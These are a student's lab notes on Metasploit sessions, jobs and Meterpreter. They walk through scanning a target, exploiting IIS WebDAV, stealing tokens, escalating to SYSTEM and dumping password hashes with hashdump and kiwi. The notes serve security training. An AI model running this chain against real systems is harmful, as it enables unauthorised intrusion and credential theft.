6 - MSF Sessions - JA Smith

# Sessions & Jobs - MSF can manage multiple modules at the same time using sessions - Able to switch between sessions and link a different module to one of the bg'ed sessions to run on it or turn them into jobs. - While running a module in `msfconsole`, we can bg the session as long as they form a channel of communication with the target host by pressing the `[CTRL] + [Z]` key combination or by typing the `background` command in the case of Meterpreter stages ```bash msf6 > sessions #shows current sesssions msf6 > sessions -i N #opens session N ``` - we can use the `jobs` command to look at the currently active tasks running in the background and terminate the old ones to free up the port ```bash msf6 > jobs -h #shows jobs help menu msf6 exploit(multi/handler) > exploit -j #runs exploit module as a job msf6 > jobs -l #lists curren tjobs ``` # Meterpreter - The `Meterpreter` Payload is a specific type of multi-faceted, extensible Payload that uses DLL injection to ensure the connection to the victim host is stable and difficult to detect using simple checks and can be configured to be persistent across reboots or system changes - Meterpreter resides in the memory of the remote host and leaves no traces on disk - Purpose: improves post-exploitation procedures, offering a hand-picked set of relevant tools for more straightforward enumeration of the target host from the inside - Can help us various privesc techniques, AV evasion techniques, further vulnerability research, provide persistent access, pivot, etc. - Designed to be stealthy, powerful, and extensible ```bash msf6 > db_nmap -sV -p- -T5 -A <target_ip> msf6 > hosts msf6 > services msf6 > search iis_webdav_upload_asp msf6 > use 0 msf6 > set RHOST <target_ip> msf6 > set LHOST tun0 msf6 > run meterpreter > getuid meterpreter > ps meterpreter > steal_token N meterpreter > getuid meterpreter > shell c:\Inetpub>dir #shows contents of current directory associated with Windows web hsot c:\Inetpub>exit meterpreter > bg #bg the meterpreter session msf6 > search local_exploit_suggester msf6 > use 0 #select a multi recon module such as post/multi/recon/local_exploit_suggester msf6 > show options #options for multi recon module msf6 > sessions #shows current sesssions msf6 > set SESSION 1 #bind the multi recon module to session 1 (bg'ed meterpreter session) msf6 > run #execute the multi recon module #multiple privesc vectors shown msf6 > use exploit/xxx #select one of the privesc vectors msf6 > show options msf6 > sessions #shows current sesssions msf6 > set SESSION 1 msf6 > run meterpreter > getuid #we are NT AUTHORITY\SYSTEM meterpreter > hashdump #shows NT or LM hashes meterpreter > lsa_dump_sam #shows NTLM hashes for users #may need to "meterpreter > load kiwi" for this command meterpreter > lsa_dump_sercrets ``` ## Meterpreter Sessions Exercise ![[images/Pasted image 20251005140739.png]] ![[images/Pasted image 20251005140758.png]] - above is a possible privesc vector that must be bound to a meterpreter session - we don't have a meterpreter session yet, so let's opent he web page for port 5000 - fortilogger app is running on port 5000 with the Microsoft IIS httpd 10.0 host - run google search for fortilogger and Microsoft IIS httpd 10.0 - fortilogger looks vulnerable urn another msf search ![[images/Pasted image 20251005141108.png]] ![[images/Pasted image 20251005140646.png]]